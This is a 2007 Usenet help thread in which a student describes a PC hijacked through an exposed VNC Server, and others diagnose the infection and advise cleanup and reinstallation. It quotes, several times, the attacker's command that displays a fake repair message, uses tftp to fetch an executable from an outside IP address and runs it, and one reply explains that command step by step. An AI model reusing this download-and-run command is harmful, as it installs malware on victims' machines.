Trojan from using VNC Viewer Software

Trojan from using VNC Viewer Software

am 30.03.2007 17:55:11 von matt

Hey guys. I've bene using the VNC Viewer software to access a Linux
environment at my University's Linux servers.

However, I have over the last few days had a number of occurances of a
Trojan somehow finding its way onto my computer. At some point I would
suddenly lose control of the computer. A Task Manager window would
come up, followed by a run window. In this run window the following
two things are entered:

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
64.79.213.12 GET ktqjy.exe & start ktqjy&

%systemroot%\system32\cmd.exe

In the past I have always been at my computer, so I have been able to
interrupt it by just turning the computer off before it can do that it
is trying to do. Following the last occurance I spent all afternoon
running virus scans and spyware scans using:

AVG Anti virus
AVG anti spyware
Zonealarm Pro's spyware scanner
Spybot Search and Destroy

A Trojan was found (called Generic3.ARX) by AVG and a number of
Spyware items were found and deleted. Satisfied that allw as well, I
opened up the VNC Viewer software and got back to work.

However, today whilst I went away to get a drink the Trojan ran again.
This time I was unable to interrupt it and I came back to find a Task
manager window, a run window and a command prompt all open. Clearly
whatever the Trojan tries to do it has succeeded. I am running both
AVG anti virus and anti spyware scans at the moment but nothing
appears to be coming up this time.

Therefore, what can I do to eradicate whatever this Trojan has done to
my computer? What sort of things would this Trojan do? (or begin doing
as we speak?). Simply stop using VNC Viewer is not an option as I need
it to do my coursework.

I run the latest version of ZoneAlarm Pro along with the other
programmes mentioned above to combat spyware.

Kind regards,

Matt

Re: Trojan from using VNC Viewer Software

am 30.03.2007 18:21:18 von Spack

Matt wrote on 30 Mar 2007 08:55:11 -0700:

> Hey guys. I've bene using the VNC Viewer software to access a Linux
> environment at my University's Linux servers.
>
> However, I have over the last few days had a number of occurances of a
> Trojan somehow finding its way onto my computer. At some point I would
> suddenly lose control of the computer. A Task Manager window would
> come up, followed by a run window. In this run window the following
> two things are entered:
>
> %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
> 64.79.213.12 GET ktqjy.exe & start ktqjy&
>
> %systemroot%\system32\cmd.exe
>
> In the past I have always been at my computer, so I have been able to
> interrupt it by just turning the computer off before it can do that it
> is trying to do. Following the last occurance I spent all afternoon
> running virus scans and spyware scans using:
>
> AVG Anti virus
> AVG anti spyware
> Zonealarm Pro's spyware scanner
> Spybot Search and Destroy
>
> A Trojan was found (called Generic3.ARX) by AVG and a number of
> Spyware items were found and deleted. Satisfied that allw as well, I
> opened up the VNC Viewer software and got back to work.
>
> However, today whilst I went away to get a drink the Trojan ran again.
> This time I was unable to interrupt it and I came back to find a Task
> manager window, a run window and a command prompt all open. Clearly
> whatever the Trojan tries to do it has succeeded. I am running both
> AVG anti virus and anti spyware scans at the moment but nothing
> appears to be coming up this time.
>
> Therefore, what can I do to eradicate whatever this Trojan has done to
> my computer? What sort of things would this Trojan do? (or begin doing
> as we speak?). Simply stop using VNC Viewer is not an option as I need
> it to do my coursework.
>
> I run the latest version of ZoneAlarm Pro along with the other
> programmes mentioned above to combat spyware.
>
> Kind regards,
>
> Matt


This should have nothing to do with the Viewer, are you sure you didn't also
install the Server on your own machine and leave the port open to the
outside world? See http://www.realvnc.com/pipermail/vnc-list/2007-February/0570 50.html
for more info, basically someone/something is connecting to the VNC Server
on your machine bypassing the authentication, and then running the commands
(either manually or using a script, most likely using a script). I'm
guessing that when you downloaded and installed VNC Viewer you actually
download the full Client+Server package and installed both, and you allowed
VNC Server to listen in Zone Alarm, probably when it first ran and you
blindly hit the Allow button. Get your machine cleaned and uninstall VNC
Server - you do not need the server component to use the Viewer to access
another machine.

Dan

Re: Trojan from using VNC Viewer Software

am 30.03.2007 18:37:33 von Leythos

On Fri, 30 Mar 2007 08:55:11 -0700, Matt wrote:

> Hey guys. I've bene using the VNC Viewer software to access a Linux
> environment at my University's Linux servers.
>
> However, I have over the last few days had a number of occurances of a
> Trojan somehow finding its way onto my computer. At some point I would
> suddenly lose control of the computer. A Task Manager window would
> come up, followed by a run window. In this run window the following
> two things are entered:
>
> %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i
> 64.79.213.12 GET ktqjy.exe & start ktqjy&
>
> %systemroot%\system32\cmd.exe
>
> In the past I have always been at my computer, so I have been able to
> interrupt it by just turning the computer off before it can do that it
> is trying to do. Following the last occurance I spent all afternoon
> running virus scans and spyware scans using:
>
> AVG Anti virus
> AVG anti spyware
> Zonealarm Pro's spyware scanner
> Spybot Search and Destroy
>
> A Trojan was found (called Generic3.ARX) by AVG and a number of
> Spyware items were found and deleted. Satisfied that allw as well, I
> opened up the VNC Viewer software and got back to work.
>
> However, today whilst I went away to get a drink the Trojan ran again.
> This time I was unable to interrupt it and I came back to find a Task
> manager window, a run window and a command prompt all open. Clearly
> whatever the Trojan tries to do it has succeeded. I am running both
> AVG anti virus and anti spyware scans at the moment but nothing
> appears to be coming up this time.
>
> Therefore, what can I do to eradicate whatever this Trojan has done to
> my computer? What sort of things would this Trojan do? (or begin doing
> as we speak?). Simply stop using VNC Viewer is not an option as I need
> it to do my coursework.
>
> I run the latest version of ZoneAlarm Pro along with the other
> programmes mentioned above to combat spyware.

First, how do you know it's a trojan STILL on your system?

Did you reset the VNC connection password?

Did you change the default VNC Server port to something other than 5900?

Why is your computer exposed directly to the internet instead of behind a
NAT appliance of some type?




--

Want to know what PCBUTTS1 is really about?

*** WARNING - this links contains foul/pornographic content of an

abusive nature created by PCBUTTS1 and still hosted on his public

website ***

http://www.pcbutts1.com/downloads/leythos.htm

Re: Trojan from using VNC Viewer Software

am 30.03.2007 18:57:24 von matt

> First, how do you know it's a trojan STILL on your system?

That's an assumption I am making, I doubt the Trojan would kindly
remove all traces of itself once it has done what it wanted to do.
I've run scans in all the programmes I mentioned above and one of them
could find any mention of this Trojan, so it was has clearly tidied up
after itself very well.

> Did you reset the VNC connection password?

I'm using VNC Viewer 4.1.2 (the free one) which has no such option

> Did you change the default VNC Server port to something other than 5900?

Again, I had no such option

> Why is your computer exposed directly to the internet instead of behind a
> NAT appliance of some type?

I use a router (which HAD the ports open for VNC I thought I needed,
but I have just closed them realising of course that they aren't
actually needed), along with Zonealarm, so I don't see myself as being
directly connected to the Internet.

Kind regards,

Matt

Re: Trojan from using VNC Viewer Software

am 30.03.2007 19:03:04 von matt

> This should have nothing to do with the Viewer, are you sure you didn't also
> install the Server on your own machine and leave the port open to the
> outside world? Seehttp://www.realvnc.com/pipermail/vnc-list/2007-February/0 57050.html
> for more info, basically someone/something is connecting to the VNC Server
> on your machine bypassing the authentication, and then running the commands
> (either manually or using a script, most likely using a script). I'm
> guessing that when you downloaded and installed VNC Viewer you actually
> download the full Client+Server package and installed both, and you allowed
> VNC Server to listen in Zone Alarm, probably when it first ran and you
> blindly hit the Allow button. Get your machine cleaned and uninstall VNC
> Server - you do not need the server component to use the Viewer to access
> another machine.

You are absolutely right, I did install the full package and probably
did tell ZoneAlarm to let it have special prividedges. I will
uninstall it right away. The only problem is that I don't think I am
going to be able to "clean" ym computer, because after running all the
scans I mentioend above, none of them came up with anything.

Is their anything I can do aside from reformatting my computer to
ensure I get rid of this?

Kind Regards,

Matt

Re: Trojan from using VNC Viewer Software

am 30.03.2007 19:22:48 von matt

> First, how do you know it's a trojan STILL on your system?

That's an assumption I am making, I doubt the Trojan would kindly
remove all traces of itself once it has done what it wanted to do.
I've run scans in all the programmes I mentioned above and one of them
could find any mention of this Trojan, so it was has clearly tidied up
after itself very well.

> Did you reset the VNC connection password?

I'm using VNC Viewer 4.1.2 (the free one0 which has no such option

> Did you change the default VNC Server port to something other than 5900?

Again, I had no such option

> Why is your computer exposed directly to the internet instead of behind a
> NAT appliance of some type?

I use a router (which HAD the ports open for VNC I thought I needed,
but I have just closed them realising of course that they aren't
actually needed), along with Zonealarm, so I don't see myself as being
directly connected to the Internet.

Kind regards,

Matt

Re: Trojan from using VNC Viewer Software

am 30.03.2007 22:48:15 von Default User

On 30 Mar 2007 10:03:04 -0700, "Matt" wrote:

>Is their anything I can do aside from reformatting my computer to
>ensure I get rid of this?

Use Autoruns to look for startup programs that you didn't authorize. Look
for any instances of DLL files being loaded on startup that are not
authorized. You can try looking in the System32 directory for recently
modified files, or hidden files that have random names like xzlk.dll, and
send the files found to http://www.virustotal.com/en/indexf.html for
analysis. You could also try running a spyware scanner like Spybot Search
& Destroy or SuperAntiSpyware; the later can detect files based on
characteristics like size, random file names, and other attributes that are
common among trojans and malware.

Re: Trojan from using VNC Viewer Software

am 31.03.2007 00:25:18 von "Mr. Arnold"

> Is their anything I can do aside from reformatting my computer to
> ensure I get rid of this?
>

Re: Trojan from using VNC Viewer Software

am 31.03.2007 15:33:07 von matt

On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
> > Is their anything I can do aside from reformatting my computer to
> > ensure I get rid of this?
>
>

That makes for some interesting reading, looks like a reformat is the
only option.

Thanks to everyone for all the replies.

Kind Regards,

Matt

Re: Trojan from using VNC Viewer Software

am 31.03.2007 19:43:08 von Rick Merrill

Matt wrote:
> On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
>>> Is their anything I can do aside from reformatting my computer to
>>> ensure I get rid of this?
>>
>
> That makes for some interesting reading, looks like a reformat is the
> only option.

There are exploits that modify the POST code and BIOS so that even
reformatting may not help :-( Is it time for a new computer???

Re: Trojan from using VNC Viewer Software

am 31.03.2007 21:11:43 von kurt wismer

Rick Merrill wrote:
> Matt wrote:
>> On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
>>>> Is their anything I can do aside from reformatting my computer to
>>>> ensure I get rid of this?
>>>
>>
>> That makes for some interesting reading, looks like a reformat is the
>> only option.
>
> There are exploits that modify the POST code and BIOS so that even
> reformatting may not help :-( Is it time for a new computer???

??? i've never heard of anything specifically modifying the power on
self test (post) facility of a computer (isn't it *part of* the bios?)...

as for the bios, the only modifications any known malware has ever made
is to corrupt flashable bios, and that is rather noticable as it stops
the computer from booting...

so no, it's not time for a new computer yet...

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"

Re: Trojan from using VNC Viewer Software

am 01.04.2007 20:14:42 von unknown

Post removed (X-No-Archive: yes)

Re: Trojan from using VNC Viewer Software

am 01.04.2007 20:19:02 von unknown

Post removed (X-No-Archive: yes)

Re: Trojan from using VNC Viewer Software

am 02.04.2007 01:38:38 von kurt wismer

Sebastian Gottschalk wrote:
> kurt wismer wrote:
>> Rick Merrill wrote:
>>> Matt wrote:
>>>> On Mar 30, 11:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
>>>>>> Is their anything I can do aside from reformatting my computer to
>>>>>> ensure I get rid of this?
>>>>>
>>>> That makes for some interesting reading, looks like a reformat is the
>>>> only option.
>>> There are exploits that modify the POST code and BIOS so that even
>>> reformatting may not help :-( Is it time for a new computer???
>> ??? i've never heard of anything specifically modifying the power on
>> self test (post) facility of a computer (isn't it *part of* the bios?)...
>>
>> as for the bios, the only modifications any known malware has ever made
>> is to corrupt flashable bios, and that is rather noticable as it stops
>> the computer from booting...
>>
>> so no, it's not time for a new computer yet...
>
> Actually it's quite trivial to modify the BIOS (intentionally!), see what
> the BIOS modder communities are achieving. It would be no problem to
> implement such malware.

which sounds like it contradicts what i said, but magically doesn't...

what would/could/should be can differ wildly from what is...

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"

Re: Trojan from using VNC Viewer Software

am 02.04.2007 11:38:55 von unknown

Post removed (X-No-Archive: yes)

Re: Trojan from using VNC Viewer Software

am 03.04.2007 03:50:58 von matt

> ??? i've never heard of anything specifically modifying the power on
> self test (post) facility of a computer (isn't it *part of* the bios?)...
>
> as for the bios, the only modifications any known malware has ever made
> is to corrupt flashable bios, and that is rather noticable as it stops
> the computer from booting...
>
> so no, it's not time for a new computer yet...

Well I formatted and reinstalled Windows a few days ago now and
everything seems to be running smoothly.

Thanks again for all the replies on this topic.

Kind regards,

Matt

Re: Trojan from using VNC Viewer Software

am 03.04.2007 21:32:51 von kingthorin

On Mar 30, 6:25 pm, "Mr. Arnold" <"Mr. Arnold"@Arnold.COM> wrote:
> > Is their anything I can do aside from reformatting my computer to
> > ensure I get rid of this?
>
>

Well assuming your original post contains the only commands that were
run here's what we can figure out.

"%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -
i
64.79.213.12 GET ktqjy.exe & start ktqjy& "

%comspec% is an environment variable on windows system which points to
the command prompt executable. We can verify this by launching a
command prompt and echo'ing the value to the screen, ie:
C:\Documents and Settings\someuser>echo %comspec%
C:\WINNT\system32\cmd.exe

Next we can see what the /c switch does for the command prompt
(cmd.exe), ie:
C:\Documents and Settings\someuser>cmd.exe /?
Starts a new instance of the Windows XP command interpreter

CMD [/A | /U] [/Q] [/D] [/E:ON | /E:OFF] [/F:ON | /F:OFF] [/V:ON | /
V:OFF]
[[/S] [/C | /K] string]

/C Carries out the command specified by string and then
terminates

Ok so /c carries out the commands provided when cmd.exe is called (via
%comspec%).

Next we see that he echo'd some useless junk to the
screen....Repairing....Please Wait, laaa deee daaaa.

Next he uses tftp to connect to 64.79.213.12 and get ktqjy.exe. We can
verify this by checking the command optionsn for tftp:

C:\Documents and Settings\someuser>tftp /?

Transfers files to and from a remote computer running the TFTP
service.

TFTP [-i] host [GET | PUT] source [destination]

-i Specifies binary image transfer mode (also called
octet). In binary image mode the file is moved
literally, byte by byte. Use this mode when
transferring binary files.

So -i specifies binary transfer which is what he'd need for a
executable (exe).

Lastly he launches ktqjy.

ktqjy.exe should be sitting in whatever the default directory of your
command prompt is, something like "C:\Documents and Settings\someuser"
if you goto the start menu select run type cmd and hit ok it'll be
displayed on the screen. You can navigate to this directory in
explorer and delete the file. You may have to launch task manager and
"End Process" on it first. Also you should fire up msconfig (start:run
msconfig) and review all your startup items.

etc....

Just follow the information you have.

Re: Trojan from using VNC Viewer Software

am 04.04.2007 13:36:58 von unknown

Post removed (X-No-Archive: yes)

Re: Trojan from using VNC Viewer Software

am 04.04.2007 13:54:15 von kurt wismer

Sebastian Gottschalk wrote:
> kingthorin@gmail.com wrote:
>
>> Lastly he launches ktqjy.
>>
>> ktqjy.exe should be sitting in whatever the default directory of your
>> command prompt is, something like "C:\Documents and Settings\someuser"
>> if you goto the start menu select run type cmd and hit ok it'll be
>> displayed on the screen. You can navigate to this directory in
>> explorer and delete the file. You may have to launch task manager and
>> "End Process" on it first. Also you should fire up msconfig (start:run
>> msconfig) and review all your startup items.
>>
>> etc....
>>
>> Just follow the information you have.
>
> In the meanwhile, ktqjy.exe has modified various system binaries, imposed
> some kernel hooks such that killing just removes it from the list of
> processed (but still keeps on running) and doesn't list the three other
> copies of itself not any more, has downloaded 5 other binaries and executed
> some, modified some system settings to open some obstrusive security
> vulnerabilities to allow easier reinfection, ...
>
> Oh, and it might have simply modified the previous history.
>
> Short to say: You have no reliable information whatsoever.

is this something you know for sure or are you just trying to scare
people now?

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"

Re: Trojan from using VNC Viewer Software

am 04.04.2007 14:11:37 von unknown

Post removed (X-No-Archive: yes)